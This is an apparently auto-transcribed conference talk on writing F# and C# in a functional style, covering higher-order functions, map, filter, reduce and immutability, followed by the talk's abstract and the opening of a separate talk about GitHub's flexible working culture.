enforce purity where you cannot mutate anything at all whatsoever. If that is the inner circle, then I would move F-sharp to the border of that circle and Scala to the border of the circle, because those languages do provide a way to enforce immutability, but they also provide mechanisms to break away from it, so they're not very pure in that regard. But then a language like Erlang has more purity built into it, so it clearly fits into this inner circle of very pure functional languages. So in terms of purity, what is the benefit of purity? The benefit of purity, like I talked about, is referential transparency. You can reorder functions at will, and it becomes easier to really create concurrent applications. But what about higher order functions?
We can create higher order functions in most languages today. Let's start with an example in C-sharp and work with a little bit of an example of higher order function. So let's say I have a list of numbers on hand and this list of numbers is going to be, let's simply say that I'm going to have just a bunch of values given to this. So this is going to be let's say a few values that I can think of here and I want to loop through these values and print these values, pretty common operation, but a very simple operation also. Now we all know one way to do this, right? For int i equal to zero, i less than numbers dot count and this is the part where you have to pause and ask yourselves, is it less than or less than or equal to? That is called a self-inflated wound, right? There is no reason to suffer through those anymore in programming and this is so archaic way of doing it, but sure that's definitely an option available for us and then we can of course print the value in this case and I could say this is going to be the numbers i that I want to print, maybe I'll give a space here and then when we are done with this we'll just give a empty line for it to print the values out. But of course a better way to program this in C sharp is to use a for each statement where we could go through the numbers and right off the bat we can see how lightweight this is relatively speaking and then we could say the number e itself I want to print, no need to mess with the indices values that becomes a lot more easier to work with. But of course you don't have to work through that much effort also in C sharp anymore so you could use more of a higher order function in this case. So you could simply say why not take the numbers and call a for each on it directly where I'm going to receive an element and I'm going to simply ask him to print the value of the element I have on hand and in this case I'm going to print the element e given to me. So if you look at this example here what I'm doing is to use an higher order function but what in the world is on higher order function. Just look at this part for a second we'll get back to this more but to us most of us we could say a function contains four things. A function has a name, a function has a body, a function has a return type and a function has a parameter list. So given a name, a parameter list, a return type and a body we could argue the body is the most important thing in a function. So in this function this is a function we are sending to the for each function so the for each function is considered to be the higher order function and the reason for each is a higher order function is the function says I am really elevating myself not just asking for objects to be sent to me but I'm even willing to accept functions from you so it's really a higher order function that you can pass functions to this function you can return functions from functions you can also create functions within functions as well. Now in this case the for each higher order function is receiving a function and to the right of this arrow is the body of the function you are trying to send to this function. So of the four things I talked about we covered the body what about the parameter list the parameter list is to the left of the arrow right there what about the return type the return type is inferred hey what about the name of this function well what's in the name it's anonymous we don't care to give a name for this function. 
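The example above is C#, but the same four-part anatomy is easy to see in an F# lambda, the talk's main language; a small sketch (the list contents are illustrative):

    let numbers = [1; 2; 3; 4; 5; 6]

    // 'fun e -> printf "%d " e' is the whole function:
    //   parameter list: e         body: printf "%d " e
    //   return type: inferred     name: none (it is anonymous)
    List.iter (fun e -> printf "%d " e) numbers
    printfn ""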
So the for each function is a higher order function that accepted this function as a parameter and we pass to it and as a result we moved away from what is a traditional external iterator to more of a nice and concise internal iterator. An external iterator is kind of like a root dog in the house it just sits on your mat and you have to ask it to move and every time you have to push it it doesn't want to move a foot right. What is an internal iterator completely relieves the duties from your hands it says I will do the looping you simply tell me what you want to achieve for each of the iterations in the loop. So as a result it's a lot more concise and it takes away the tedious effort and lets you focus on the real essence of what you're trying to do. In a similar way we could use higher order functions in F sharp I'll give you two examples of how we could do this here. So let's say numbers equals a list of numbers I want to create one to six by the way and I want to print these numbers I'm not going to go through a external iteration here well actually let's do that why not. So because F sharp is a hybrid language it allows you to do both ways of doing things but we should have the wisdom to choose the right way to do stuff in this particular context. So you could say for example for element E in numbers and you could ask him to do and you can ask him to print in this case the value of the element itself that you have on hand and when you are done of course I want him to print in this case an empty list for us so that could be an example of how we could print the values using an imperative style and through a traditional looping mechanism we could do that. But we don't have to do coding like that in F sharp a more idiomatic way I think that is the most important thing when you program in languages it's really not about the syntax of a language I mean honestly I could program in about maybe ten different languages comfortably but every language is painful to me as I begin to learn because the syntax never seems to stick into my fingers until I code enough I can't remember those things but learning the syntax is of no use at all because the real essence in a language is not in its syntax but in its idioms. 
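A compact F# comparison of the two iteration styles just described, plus the shortened form that comes up next; the list contents are illustrative:

    let numbers = [1; 2; 3; 4; 5; 6]

    // external iterator: we drive the loop ourselves
    for e in numbers do
        printf "%d " e
    printfn ""

    // internal iterator: List.iter drives the loop, we only supply the action
    List.iter (fun e -> printf "%d " e) numbers
    printfn ""

    // and because printf "%d " is already a one-argument function, the wrapper
    // lambda can be dropped entirely (the partial application discussed next)
    List.iter (printf "%d ") numbers
    printfn ""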
Now think about this for a minute idioms are really the problematic areas but also fun areas also you know I can speak English actually I can speak English barely as my English teacher would like to you know remind me and when I can speak English but I go to different countries and what really tips me a trip me off is when they speak English it's not that I cannot understand the words they speak but I don't know the idioms they speak so I cannot just look up a dictionary and say what are those words mean and when you put the words together it means something absurd and nonsense and definitely doesn't mean what they actually said because idioms are structured based on culture and context and there's always a story behind idioms as they were created so learning the language involves learning the structure and the grammar of the language but also learning the idioms when you learn in a society and normally you learn the idioms in a society when you live in the society for a while and you kind of ask people what does that mean why did you say that in a similar way when you program in a language it's not about the syntax of the language but we have to pick up the idioms how do people who are common in that language program in that language the idiomatic style of the language is important for us to understand so what I'm going to do here is to tell that I want to take the numbers over here and I'm going to call it a rater and to the iterator I'm going to pass the print function and I tell the print function to print over here a element that I want to print but what in the world is this element well you're going to say fun e and the reason why you use fun here is it really is fun to program in f sharp right so that's why you say it's a function that you're defining an anonymous function you are defining and the parameter of this function takes this e and then print is going to print that function and this is going to operate on the numbers collection you are utilizing now that is one way to write the code in f sharp but you don't have to put that much effort in f sharp to do this you could also do the same thing by calling it a rater and you can simply specify here the print function itself over here if you will and you can tell him I want to simply print the variables I have on hand for whatever the variable given to me from the numbers over here and you can see that he's able to print that right here off the bat without us having to do any extra work so you can see that in this particular case the print function knows that it needs two parameters and it also knows that the second parameter is really going to be passed through from the parameter this is anonymous function is receiving so f sharp really saves a bit of an effort on your shoulders it says you don't have to write a stupid code that just simply receives a parameter only to pass it down the chain I will do the job for you you just take it of the other parameters needed in this particular function in a similar way if this function were to take two parameters but those really are what you receive as parameters you can completely drop the parameters and just drop the function name in there and it will receive the parameters and chain it through so it really saves the effort you are not really writing useless code and you can just focus on the most important code you want to write so that is an example of the code in f sharp using higher order functions and a more of a dramatic style of writing this code by the way I'm writing a quite a 
bit of code here you can download the code from my website later on if you are interested and you can play with it the fun about you know code is you can work with it break it change it evolve it certainly you can download it anytime you want to from that website so I'm talking about the functional style the higher order functions here quite a bit but how does this really map over to an imperative versus a functional style of coding so let's take a look at two examples of this let's first look at C sharp for a minute imagine for a minute you are given the task of doubling each of the numbers given to you so that's what you've been asked to do so how would you double the values in the list in a traditional C sharp code so it looks something like this right you say list integer doubled but it's really doubled boring way of doing it right because we've done this before and equals to new list of integer and then what do you do after this you say for element e in numbers and then you say double the boring dot add e times two and when you are done with it you can say element in double the boring and then you can print out the value at this point and you can say this is going to be the value in the element that you want to print and then you can specify the value that you have printed so far so that is basically the code that is going to loop through and print the values in this particular collection now look at this example for a second what did I do wrong anybody sees what the problem is at the end I'm missing a curly brace at the very end that would actually helps to put it thank you for debugging that I should have stayed with that error it was fewer errors okay so what's the problem now for each thank you so so there another for each of course are we done with this alright so right there that was a lot of code to write no wonder there's more mistakes to make over there right by the way we all have done code like this right yeah how do you feel about this code when you write it you feel dirty don't you you don't feel energetic you go home what do you say you say don't touch me I have to shower first right and you feel like you have to cleanse yourself before you go home right because that is so you know boring code to write doesn't have any useful stuff other than one little logic hidden somewhere deep in there we shouldn't be writing code like that why don't we try something a little differently let's kind of comment that out for a second and let's simply say hey why not simply say output for me well what a well actually let's create a collection right now so we could say list integer doubled equals and let's simply say at this point the double the value is going to be numbers dot select well what do I want to select given an element that is given to me I want to select an element times two as a parameter so far each of the elements bar e in doubled now I can simply print out the value of the element given to me so we could use an internal iterator as well but the essence really in this particular case really is looking at the select statement itself that we are really interested in working through in this particular code example right so basically what we are doing here is asking him to loop through up let me make sure I didn't comment out more than I should comment out that should really be down here so let's put that here let me get rid of this for a second so so right there is the list okay let's try this one more time so list of integer I want to create doubled equals and I want to 
simply say in this particular case the numbers dot select and what do I want to select with this given an element e I'm interested in returning an e times two that's what I'm really interested in selecting at this particular point and of course he's complaining I can't put into a list over here it's an enum that I'm getting an enumeration I'm getting so now I can say for each of the elements e in doubled I can simply ask him to print the value out which is going to be the element in this particular case so you can see how we can use more of a imperative style versus a functional style that you saw in the bottom to really do the operation in the case of F sharp in a similar way you can do this in C sharp rather in a similar way you can do this in F sharp as well we already have the numbers on hand but I want to really perform this operation but really think about this if you have a collection of data coming in you're applying certain operation on each of the elements but they are pretty much independent of each other and the output you get is a computation applied on the input there is really no mutability involved in this context you get a series of input and you get a series of output it nicely flows through this so in that regard I can simply say here I want to simply print in this case the object I have on hand and the object I have I have on hand is numbers dot map and what do I want to do the mapping for given an element return to me e times two that's what the mapping I want to apply and this is going to be on the list dot map and it's going to apply on the numbers that's given to me on hand that's the operation I want to perform so you can see how it's able to apply this operation on each of the elements so you are saying given this particular numbers object I want you to transform that numbers object using this transformational function so it's a mapping of input to an output if you are in doubt at this point you can look at for example the original numbers object given to you and you will notice that the original object has been untainted because it's completely immutable and sitting nicely in the memory we didn't mess with it so you can see how concise this operation is when you are trying to perform this in a imperative style versus a functional style of coding just becomes a lot easier to work with now we can take this further and operate on several other things you say okay Venkat that was kind of simple you really took over this particular value and applied this on function on these values and then you got a result no big deal but what if you really had to perform a mutation in your code for example let's say I want to total the age of everybody in this room and how would I total the age of everybody in this room I'm going to put a zero on the wall here and say everybody come over here and add your age to the number on the wall now I have to police and make sure everybody falls in a line nobody tries to run over here together I got to worry about synchronization issue and all of that right but let's try to do this a little differently and the way we are going to do this is imagine for a minute that I'm going to ask everybody here to total the age of everybody in this room collectively we're going to work together and we're going to start with this gentleman over here well he's not laughing he's kind of grim at this point no I'm not going to ask for your real age that's okay so the way we're going to do this is the following imagine I have a special post it note this post this 
post it note is special in that it's a right once post it notes you cannot rewrite on it you cannot erase what's there you cannot change what's there so that's pretty much a done deal once you write once on it so I'm going to put a zero on this post it note and I'm going to give it to you what's your name sir Mohammed is going to get that post in note from he and he sees a value of zero because zero is the age of everybody to his left right now and he's going to take his own age and he's going to total to the value of zero so he's got his age in his mind but he has to pass it to what's your name sir even he's going to pass it to either how is how is that going to happen because he's not allowed to change this right what are his options he could create a new one isn't it so this is a moment for me one day one of the things that is very beneficial to have for functional programming is automatic garbage collection can you imagine writing functional code in C++ every few lines you have to put a delete that would suck right so in this case Mohammed doesn't care about this he takes this post it with a zero totals his age to it creates a new post it note sends it down the chain and discards it makes sense let's put that in code and see how that's going to work let's do this in a imperative style first in a style you don't want to do first so we can compare it and see how this works imagine the numbers are the ones I want a total so I'm going to say let total equal to zero but I cannot change the value of total right so how do we really make sure I can change this value of total what should I do I have to shame myself first that's correct right so I have to say mutable followed by putting my head down right yes I created a mutable variable that's what I did all right then I say for element e in numbers I can say total is equal to the total value past value plus the element so when we are done with that we can say total is and we could specify the value of total that we have on hand that is a imperative style of coding isn't it so we are simply asking him to run through the total so total is equal to zero let's see where the error comes from numbers equal to so what's he complaining about line number four he's not happy do so right there is numbers do and ask him to run through it so right there is total is 21 but that's an imperative style of coding right that's what we are doing asking him to loop through and mutate the variable continuously but we're going to write this code in a way not a single variable is tortured right are mutated in the code how could we possibly do that so I'm going to use a special function I'm going to say in this case let total you know let's call this total mutable for lack of you know to make it really obvious that we created a mutable variable right so that's a total mutable that we used and now I'm going to create in this case total mutable there we go and in this case what I'm going to do is to use a let total equals but what is this value really going to be equal to list it out reduce so reduce is a function I'm going to use where the reduce function says given a collection I'm going to reduce it to a single value but how am I going to reduce it so what the reduce function we talked about internal iterators before this is a special internal iterator the for each we talked about or the Iter we talked about simply applies the function to each of the elements in the collection that's all it does but reduce is special it is an iterator alright but what it does is it 
it starts with the collection given to it and says I'm going to take the first two elements apply the operation get a result and then I'm going to move to the next element take the result and the next element apply the operation get the result move to the next element apply this result and the next element again so it kind of cascades through and the last operation it performs the result it gets it says oh there's no more element here you go and use you the result at that point this is kind of like you passing the value down the chain and what I get back over here in the very end is the age of everybody in this row now imagine what the beauty of this is I could start with him here and we could pass the immutable posted notes along the way and finally the gentleman up there is going to give me the age of everybody in the room which will be some value or an overflow no I'm just kidding right so it'll be some value right that's one way to do it but that's a sequential way of doing it but on the other hand we could do this a little differently we could say let each person in each of the row on the first streets seats start this so we can go in parallel now and everybody is totaling in each of the row and the people on the last you know seat in each of the row have one additional responsibility they have to pass the posted notes up the chain now we can finish this in as many rows as there are that less time right because we are doing it concurrently and then we can do it sequentially that operation there would be the reduced operation where we take all these set of data and we shrink it back to one value in the very end so how would this really look like so the reduced function is going to work with numbers collection but what's the operation we want to perform here I want to perform the operation of add it so what in the world is added so add it is going to be a function I want to create which takes a two numbers and one and and two as parameters and what does it do returns and one plus and two as the value for it that's all I'm going to do right so all that added method does is it simply or you can call it add to if you want to doesn't matter right so we'll call it add to so add to is a function that is going to take number one and number two and simply add them so the add to function is going to just add through the values and notice in this particular case when I finish this I ask him total is and percent D in this case total and he's going to tell me what the total is and they better be the same value so we can see how we applied the reduced method to do the same operation but we did not modify a single variable in this context how in the world did this do the job the way it did it is the reduced method says I'm going to take the numbers given to me I'm going to take the first two elements call the add to method it gives me a result I'm going to then take the result and the third element and call add to take the result and the fourth element call add to take the result and the fifth element call add to and continue along the way until I finish the elements and give you the result on hand so that is the pure immutable approach to go through the exercise of doing what we did earlier with full mutability at this point so we can see how we could even remove mutability from code quite a bit along the way but the real point of all of this really is not about removing mutability but it is really about state transformation so what does that really mean so if you ask me how do you build an 
application where nothing changes, I would say that's very simple: it starts with main, the curly bracket opens, and it immediately ends, and nothing changes, right? Well, of course, something has to change in the system for things to take effect, but this really is a rethinking of the way we design software. We have designed software with object-oriented programming, and Alan Kay, who coined the term OO, really didn't mean it to take the shape it did; languages like C++ and Java and C# drove it along one direction, which is to take objects and beat on them and keep mutating them. That's one way to develop software, but it doesn't have to be the way to develop software. So let's think about how this could work a little bit. I'm going to ask for Mohammed's help again one more time. Let's say for a minute I have with me 10 kroner and I need change for it; I want to ask him to split it into two. I give it to Mohammed and say, Mohammed, could you do me a favor, could you please split this 10 kroner into two? If he stands up and tears it into two pieces, I'll be very unhappy with him, because when I asked him to split it I didn't ask him to tear it into two pieces. What is he going to do? He's going to take the money I give him, put it in his pocket, and then take two fives and give them to me. That's what he's going to do, right? Or, if he doesn't have them, he's going to take some of the change he has, turn to the person next to him and say, hey, do you have some more change in these denominations, and eventually I get something back. So currency is a great example: we convert currencies not by tearing them into pieces, we convert currencies by receiving some and creating some, and we really transform the state as we go. Some agencies, of course, take money as they transform it; I lost some money along the way when I had to convert my dollar bills to kroner. So it's a transformational approach. Think about functional programming that way: rather than looking at a system as state mutation, look at a system as state transformation. Go ahead, please. Yes. So his question was: this was a simple example we looked at, but what if we have to take a number and sum it and then take a product out of it and then continue along with it, can you give an example of that? Right, so if you want to manipulate several different values in the collection, I'll create an example in a few minutes of going through a set of transformations; from that you should be able to extrapolate and see how you would apply it. I'll check back with you to see if that example is enough for you; otherwise we can take it offline and create an example that is a little more intricate, but the example I'm going to give you should give you an idea of how we can achieve that, so stay with me for a few minutes. So think about this not as state mutation or state modification but more as state transformation along the way. It's no surprise that F#, and even more so functional languages like Scala and Erlang, are really being used heavily in the financial industry, because those people seem to have gotten a good handle on this: they receive some data and then they go through a series of transformations to really make decisions.
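One way to picture this transform-rather-than-mutate idea in F# is record copy-and-update; the Account type and withdraw function below are invented purely for illustration and are not from the talk:

    type Account = { Owner : string; Balance : decimal }

    // withdraw never touches the record it is given; it hands back a new one,
    // much like handing over fresh notes instead of tearing up the old one
    let withdraw amount (account : Account) =
        { account with Balance = account.Balance - amount }

    let before = { Owner = "Mohammed"; Balance = 100.0m }
    let after  = withdraw 10.0m before

    printfn "%A" before     // Balance = 100.0M -- the original is untouched
    printfn "%A" after      // Balance = 90.0M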
there's a nice transformational logic in place of holding those in how do we apply some of those I want to give you an example of that here but before I go to that example I'll give you two examples here let's say for a minute I really want to I'll give you two examples one with these numbers then I'll create a little bit more realistic example after that so let's say for a minute and this kind of goes into something that you talked about I want to take only even numbers and double them and total them right that's what I want to do so take a take only even numbers and then double them and then total them if you really want to do some other operation after that sure you can just pass the list along the way and you can achieve that if you want to so let's start with a little bit of a baby step and then I'll combine it together so let's say for a minute let even only equals numbers dot filter so I'm going to take this collection we looked at a map function a few minutes ago what does the map do maps is given this input create an output of the same size but the operation has been applied on each element filter is different given an element of this collection create me a smaller potentially set of collection it's kind of like a cone operation rather than a cylinder operation you're reducing it to a smaller subset it could be zero or it could be the same number or anything in between those two values right so filter it what is the function I want to apply for this the function I want to apply is E is actually even so we could say give me a element where the element is actually an even number right so you can apply this filter operation on him and then you're telling him on what do you want to apply I want to apply this on numbers if you will right so you're asking him to apply the filter operation on the numbers in this particular case and and he says I'm going to loop through these and what does the filter say filter says I'm going to call a function which is going to yield a Boolean result and as long as the result is a true I will accept this member if the result is a false I will reject this number given to me that is what this is going to do in this particular case so so that is all we are asking him to do at this particular point and and then what do I do I want to print this particular function that we created so I'm going to just ask him to print the even only numbers that were created by by this particular operation so not sure exactly what the error in this particular case is let's take a look at the error result that's giving here six warning possible so he's giving us a bit of a warning let's run through it and see if the result is still produced oh that was actually a error so let me lower the font and look at the error here but bear with me for a second oh of course my mind doesn't switch between languages so quickly it's got to be list filter you are correct absolutely correct this is where when you flip between languages your brain doesn't follow through and the fingers doesn't respond automatically alright so in in C sharp you would say collection dot something right whereas in F sharp you call a static function on it so my brain doesn't switch so easily thank you for the help so right there we call the list dot filter now I have an even numbers only that makes sense right but I want to double these values how do I do that so let doubled equals and then we could say list dot map and here is the function I want to create and it returns an element times two and what is the 
collection I'm going to work with it is the even only that I want to work with so now I can print the double the values here so we'll call it doubled so this is going to be a double of each of the values but I want to total the numbers together remember so we could say totaled and what is this now let total the equals list dot reduce method that we created a few minutes ago and now what does the reduce do it takes two numbers right and one and two as parameters returns and one plus and two as a value and what is he working on on doubled obviously in this case and he's going to give us a total of the values of even numbers doubled and you can see the result being produced at this point is the double of those values but I don't have to go through this much effort to do this as you will see here in just a second so notice how I'm going to rewrite this in a different way so let's go ahead and comment this out for a second so we can see the difference how this looks when we are done with it so let's first start with numbers and I want to write print all the numbers out so I'm going to apply a function composition operation and I'm going to say list dot I turn and what do I want to do in the iteration in the iteration I want to simply print the function and I want to print each of the elements in the collection and that is all I'm going to do here is print the numbers but I really don't want to print the numbers remember I want to print the total of the double of the even numbers so let's get the even numbers first so the next operation I perform here is over here is a list and list dot what should I apply of course the filter operation what is the function function is nothing but the E mod 2 is equal to 0 is the function I want to apply and notice how he is able to filter the even numbers out and print it nice flow functional transformation happening here so the numbers that you send here is passed as a parameter here for you and the result of that is passes a parameter here for you and it just flows through this context very nicely but I really want to reduce this but only after I double the values so list dot map and the function I want to apply here is going to be e times 2 is the mapping I want to apply those values are mapped already now I want to take this value one more time and this time I want to reduce the values and the reduce value is going to be a function which takes a number one and number two and I want him to do n1 plus n2 as an operation or if you had written an add to function you can simply put the word add to right there and end of story we'll do that in a second after we finish this to see how that's going to look like so in this example the list dot reduce is going to take the result of this operation and the function is going to take n1 and n2 and he is going to return n1 plus n2 as a result let's see what the error here is int is it's a list that we are sending back to him there's a type mismatch let's see what the type mismatch is coming from 19 ah so in this case he's complaining it's no longer an iterator right because we reduce it to a single value so this is going to be a print f of the total value that we got eventually so we could just say print that value we could even say print in this case we could say you know something like print line so print fn and what are we going to print here so we could say this is going to be total is and then we could print the total value that we want to print out so that is going to be the last result to pass to him ah he's print 
fn, sorry. So that's the total value we want to print at the very end, and it's the same result as the previous time, as you can see in this particular case. So the point really is that you don't have to go through the steps and store these temporary values, but you certainly can. My recommendation to you is to start with the code at the top: if you have to apply these successive transformations, build the intermediate results and make that code work. I'm a huge fan of the mantra make it work, make it better. So first make it work, write those series of transformations; once you know what transformations you have to apply, then see if you can compose them as a sequence of operations and put them together. And if you can't figure that out, we can talk offline right after, or just drop me an email and we can definitely go into it, but what you're describing seems to fit into one of these combinations, so again, just spend some time thinking about it and see how you can apply it; if you can't, ping me and we can take a look at it, but I still feel that what you're trying to do is going to fit into one of these paradigms. Excellent question, I was waiting for you to ask that, thank you. So certainly you're looking at this and saying, okay, this is all cool, but darn it, how in the world is memory going to shine in this particular case? Absolutely, that's a big concern. There are two answers to it. One is yes, it's going to place a bigger demand on memory, but there are ways to avoid that. One way to avoid it is to cleverly use data structures that help you with it: you try to perform operations on the head of a list, so you don't have to mutate a list to add elements to it; you can keep the list immutable but keep adding elements at the head by creating new references to the existing tail. The other way to solve it is that there are some data structures that have been introduced more recently. One of them is called a trie, T-R-I-E, and a trie here is an immutable collection built as a tree structure with a very high branching factor; you can support, for example, 32 or more children per node. Phil Bagwell introduced these tries, and Rich Hickey, who created Clojure, uses tries for the immutable collections in Clojure; they are supported in Scala today as well. So when you're programming in functional languages, you end up using more of these immutable data structures, and they ease the demand on memory because they selectively make copies of parts of the structure rather than copying the entire collection. So your point is well taken: you don't want to use traditional data structures to program a functional style of code, you want to use more functional data structures, and then you get better performance and memory behavior. Take a look at tries and related data structures and you can begin to use some of those. Now let's see how we could put this to a slightly different use. I'm going to go to Yahoo and ask for some financial data, and the way I'm going to do that is to write a little code here; you can see it's not too hard. What I'm doing here is to create a getPrice method that takes a ticker name as a parameter, creates a web client, downloads the data from the web, and parses through it to get the price. But this is going to be a bit slow to run, so for a few minutes I'm going to mock it away and simply return a stale value. I'll simply say: if the ticker is
equal to Apple then return five us let's say $600 otherwise return $22 so that's my my mark the way we'll eventually remove that once we get the code to work otherwise I'm going to waste my time waiting for the web to respond with the connection here I don't even know how fast the connection is I've got some tickers on hand let's see how we can apply this so here's my task on hand get the top stock less than $500 right so that's what I want to do I want to get the top stock less than $500 let's build this in steps so tickers and I want to simply print out the tickers value that I get from this so how would I do that so let's go ahead and simply say all that I want to do is to print out so print function here an object I want to print and what's the object I want to print just the tickers so very trivial so far right it's going to just print the values I've been given in the stickers themselves that's all I'm going to do so so let's try this let me get this back to you so let's remove this for a second let's get this code to work first oh I know why so let's okay so there we go so we are asking the ticker symbols to be printed alright now what's the problem in this code I want him to get me the tickers if the ticker not tickers tickers there we go alright cool so the next step of course is I want the tickers and the prices is in it so let's ask that apply process so I can say list dot map a function with a ticker symbol what's he going to do oh gosh I have a ticker on hand but I need a collection of tickers and prices what kind of data structure could I use for that it's a collection alright the collection of what one of my favorite data structures is a tuple right some people call it tuple but a tuple so what's a tuple tuple is just a collection of data very lightweight immutable so here's a tuple the ticker symbol itself and what is the next thing I want to put here the get price for the ticker so that is basically a simple call to it notice the apple is 600 in the market value everything else is 22.22 so we got the prices now I have a collection notice I transformation I transform from a collection of tickers to a collection of tickers and prices make sense alright so then what I what am I going to do well I want to filter now and what do I want to filter filter on a function this takes a ticker price as a value a tuple right and what's he going to do well I want to filter only prices less than 500 meaning I'm going to drop apple from this right so how would this work so say second value from the ticker price is less than 500 so I'm telling him go to the second price and if the second entry in the tuple is the price is less than 500 grab it otherwise rejected notice apple got dropped everything else is in here what's the next thing I want to do okay I have all the stocks which are less than 500 but I want to pick the one that is the highest price what kind of operation could I perform for that to take from all of these and get one out of it a reduce absolutely so a list dot reduce and I'm going to take a function this takes a price one and a price two and what is this going to do if the second off if the second off TP one is greater than the second off TP two then give me TP one else give me the total price the ticker price off to so that is going to give me one of those but of course that's all marked up data let's go remove this from here and run it with the real code and it's going to the web right now asking for the data and this takes anywhere from 20 seconds to three days to run 
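While that live request runs, here is a rough, self-contained sketch of the whole chain; the ticker list and stubbed prices simply mirror the mocked values from the demo, and a real getPrice would do the web download described above:

    // stubbed-out quote lookup so the sketch runs offline
    let getPrice ticker =
        if ticker = "AAPL" then 600.00 else 22.22

    let tickers = ["AAPL"; "MSFT"; "ORCL"; "GOOG"; "QCOM"]

    let topStockUnder500 =
        tickers
        |> List.map (fun t -> (t, getPrice t))              // ticker -> (ticker, price)
        |> List.filter (fun (_, price) -> price < 500.00)   // drop anything at 500 or more
        |> List.reduce (fun tp1 tp2 -> if snd tp1 > snd tp2 then tp1 else tp2)  // keep the priciest

    printfn "%A" topStockUnder500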
and so we can kind of wait for it to run while it's waiting let's talk about what we have done so far so notice this example we have a collection of ticker symbols we are going out to yahoo grabbing all the price values then we are applying a filtering on it then we are applying a reduction on it then we are saying here's the value that you're expecting and the value right there is Q com as of yesterday $58 in price so that is an example of how we can use more functional style of coding to transform the data so notice it's a state transformational logic rather than a state mutational logic that you're applying in this particular example and you're able to achieve the result so I hope that gives you an idea about what this can do in terms of the style of programming it is a shift in paradigm it is a way for us to redesign and rethink how we develop software but it's definitely a very exciting way to do stuff this really has a bearing on our ability to develop code with more efficiency in terms of correctness and also with multi-core processors it really becomes useful I haven't quite gotten into the multi-core efficiencies but that's all I can cover for what we have on hand right now so I hope that was really useful for you thank you very much for your time. Could you pick a few things? Thank you very much.
|
Thinking in Functional Style using F# and (some) C#
Functional Programming has been around for a while, but it is gaining popularity, especially due to direct support in languages on the JVM and the CLR. Writing code in functional style is not about syntax. It is a paradigm shift. In this presentation, using examples from F# and C#, you will learn how to write code in functional style. We will start out discussing the elements of functional programming and then look at examples of some common operations and how you can implement those in functional style.
|
10.5446/50996 (DOI)
|
I want to apologize, first off, I got to Oslo and then went to sleep. No phones, please. I'm just kidding. I went to sleep and then I woke up immediately with some sort of illness that I don't know the name to. I'm going to liken it to death. So I was basically experiencing death for the last two or three days in my hotel room. And this is the first time I've gotten out of my hotel room, so I'm very excited about that. Which could be great for you if I die on stage, then this will be a conference you'll never forget. So first, I just have a story to tell you. And the story begins with four founders. And these four founders are in a coffee shop, or in a bar, a restaurant, a plane, wherever the case may be, they're somewhere. And the point is that, I mean, they had no office. They had no physical presence where they could go meet and work on this company that they founded. And two of them had other full-time jobs where they had to bring in the bacon and, you know, concentrate on that job full-time. And on top of that, all these founders like to talk. They like to travel. They like to go all over the place. So they weren't even in the same city, much less the same neighborhood or anything like that. All of that was the start of GitHub. And from the beginning, we were forced to be really distributed because everyone was all over the place. We were supposed to be very flexible because they wouldn't have done this if they couldn't come up with a really flexible way of doing it. And we were supposed to be very happy because they would not have done all this stuff and jumped through all this hoop unless they were really happy doing it. Turns out this is a really great way to work. And this is how we've worked ever since then. This talk is kind of about GitHub because I like seeing examples of how people work. But this talk is much more about improving your own company. I think this will work from anyone from the size of one person to 10,000. There's always some level that you have personal change on. Your team, how can you change your team even if you're a low-level employee to some CEO? I think that's really important to try and figure out how you can make better choices and how you can work better. So I'm Zach Holman. I'm Holman on Twitter, Holman on GitHub. And I do work for GitHub. It's a cute little company. If you guys don't know, we are the largest Git host online. We are the largest subversion host because we host subversion for all of our repositories. So we are the largest code host online. And all of this talk sort of stemmed from this three-part series I did last year called How GitHub Works. So if you're interested in reading stuff instead, you can get up and ignore my talk completely and read it. But if you want to hear me talk, that's cool. And I'll start talking now. And I first want to talk about hours. And I think hours are kind of bullshit. But in other words, this whole concept of a nine to five day is really horrible for our industry. You go way back when where you have to drag yourself to work at a particular time and leave at a particular time. That may work for other places, but for us, I don't think that really works. And I think it's harmful to think that it does. Crafting code is a really creative endeavor. We like to think that code is very logical, is very straightforward, and you just have to puzzle it out. And that's not the case. 
A lot of times you just have to sit down and really figure out what is the creative approach to this where it can come up with the most efficient code, the most crafty code, and the best code that will last into the future. And that doesn't really happen if you're just sitting down and forcing yourself to fix a problem. You can't force creativity to happen during any sort of normal work hours. It sort of happens when you're best prepared to address your creativity. So for us, I think the best solutions happen when you're in the zone. Whatever you want to define that is, anytime you can sort of sit down and say, yeah, I'm totally in the zone. Code is sort of flowing from my fingertips. I'm doing really good decisions here. That's where I want to be every time. And it's really hard to sort of force that to happen at a certain point. So our office is filled with lots of different people. It's filled with early birds. We get in the office at like 7 in the morning, allegedly. I don't see them because I definitely don't get in the morning that early. Night owls more like me. I'll stay later into the night because that's when I work better. Nine to fivers because that works better for their scheduler. Lots of international employees. People all over the place. And then people like what I'm doing right now, traveling employees. So between all of these, we don't really have a set office hour. And I think that's really important because we're able to embrace flexibility. We're able to embrace what somebody thinks is their concept of a really good way of working. A couple of years ago, we made these shirts called 90 Hours a Week in Loving It. Like Apple did back in the... I'm totally just kidding. We did not make these shirts. I think this is horrible. I think that our industry likes to say that like, yeah, I worked overnight last night and this is great. And I think that's horrible. I think it's a badge of foolishness for people to say that like, yeah, our team came together and did thousands of hours last month. It doesn't make any sense to me. I've done all the all-nighters at different companies. I've done the long hours. I've done all that stuff and it's almost always a bad idea. I come back from it and I realize that like it's totally draining me mentally. The code I've produced is much worse and it impacts future code because now you have this code that you've written and you think that it's okay, but you don't want to take it out and refactor it because you'll never get to the point where you want to refactor that stuff and it's just, it's horrible. It comes to a much more bad situation to be in. So that's sort of the crux of what we end up doing. We let people who work at get up work wherever they want and whenever they want. Because again, we want to get people to that zone in their minds where they're really creative, where they're really productive. And that's what we care about much less than core hours or anything like that. Because we just want to get the best work out of employees. That should be what you're looking at more than anything else that you do. That happens when they're happy, that happens when they're fresh and that happens when they're creative. And everything I'm going to talk about today sort of attacks that sentence. Like how many things can we do to support that? How many things can we do to come out of that? Alongside that, especially on the happy side of things, there's something that most of our industry tends to forget. And that's families. 
